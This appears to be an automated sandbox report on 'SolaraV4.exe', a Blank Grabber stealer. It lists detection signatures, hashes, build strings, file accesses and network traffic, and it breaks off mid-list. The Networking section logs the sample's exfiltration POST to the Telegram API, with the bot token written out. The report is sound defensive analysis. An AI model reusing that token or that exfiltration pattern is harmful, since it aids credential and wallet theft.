Windows Analysis Report
SolaraV4.exe

Overview

General Information

Sample name: SolaraV4.exe
Analysis ID: 1525823
MD5: e95c0515d1d3bf9c2a6e0b20ba1ebd98
SHA1: 8ca53ae3b33df086bd12d7fb31ada294f699bf9d
SHA256: 2664862a4f87e91f92f17a26e6d0b0505db5a92720f2d7eb703e0f55a88eec3f
Tags: exe, user-aachum

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

AV Detection

Source: SolaraV4.exe ReversingLabs: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.1% probability
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 108_2_00007FF7C71F901C
Source: SolaraV4.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV4.exe, 00000001.00000003.2466343863.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2990881493.00007FFE957E1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: SolaraV4.exe, 00000003.00000002.2991089669.00007FFE99DB1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: SolaraV4.exe, 00000003.00000002.2989395110.00007FFE904EB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: SolaraV4.exe, 00000003.00000002.2989741254.00007FFE90591000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: SolaraV4.exe, 00000003.00000002.2990037817.00007FFE90B61000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV4.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.pdbhP3r source: powershell.exe, 00000043.00000002.2720390881.0000016199A66000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SolaraV4.exe, SolaraV4.exe, 00000003.00000002.2981417985.00007FFE75E15000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: SolaraV4.exe, 00000003.00000002.2986882718.00007FFE7651B000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:34:57 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV4.exe, 00000003.00000002.2984685427.00007FFE760AD000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: SolaraV4.exe, 00000003.00000002.2990354313.00007FFE94441000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb?? source: SolaraV4.exe, 00000003.00000002.2981417985.00007FFE75E15000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: SolaraV4.exe, 00000003.00000002.2989049105.00007FFE8FF81000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV4.exe, 00000003.00000002.2984685427.00007FFE760AD000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: SolaraV4.exe, 00000003.00000002.2990592997.00007FFE94AC1000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: SolaraV4.exe, 00000003.00000002.2988340988.00007FFE8F3F1000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.pdb source: powershell.exe, 00000043.00000002.2720390881.0000016199A66000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: SolaraV4.exe, 00000003.00000002.2980855878.00007FFE75D8B000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: SolaraV4.exe, 00000003.00000002.2988713456.00007FFE8FF67000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: SolaraV4.exe, 00000003.00000002.2989395110.00007FFE904EB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006C.00000000.2823194797.00007FF7C7250000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 0000006C.00000002.2839982108.00007FF7C7250000.00000002.00000001.01000000.00000021.sdmp
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 1_2_00007FF6FFC583C0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC59280 FindFirstFileExW,FindClose, 1_2_00007FF6FFC59280
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC71874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC59280 FindFirstFileExW,FindClose, 3_2_00007FF6FFC59280
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC71874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 3_2_00007FF6FFC583C0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72046EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 108_2_00007FF7C72046EC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72488E0 FindFirstFileExA, 108_2_00007FF7C72488E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 108_2_00007FF7C71FE21C
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\

Networking

Source: Network traffic Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.12:49728 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.12:49728
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: ip-api.com
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: SolaraV4.exe, 00000003.00000002.2977638969.00000241338C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: blank-kf3va.in
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 726445User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=2348e3724fb61f50595577c0e0e7908f
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2Assur
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SolaraV4.exe, 00000003.00000003.2496514190.0000024132E88000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2668174875.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024132E7E000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677235249.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SolaraV4.exe, 00000003.00000003.2575357511.00000241333F6000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2965972242.000002413366F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2966812654.0000024132C0F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2966812654.0000024132BF9000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977294180.0000024133675000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2968184638.0000024132C43000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2973950151.0000024132C44000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967549443.0000024132C10000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2968142363.0000024133674000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975526442.00000241333D4000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2973573167.0000024132BF9000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975526442.00000241333F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2759210113.000002D87BCD0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3724987545.00000198520B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2807229307.00000161B17F6000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048680197.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048283576.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000002.3052583503.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3050867328.00000270AE649000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000E.00000002.2764906362.000002D87C025000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000E.00000002.2764906362.000002D87C044000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000E.00000002.2764906362.000002D87C044000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 0000001C.00000002.3724670065.0000019852000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digi
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, 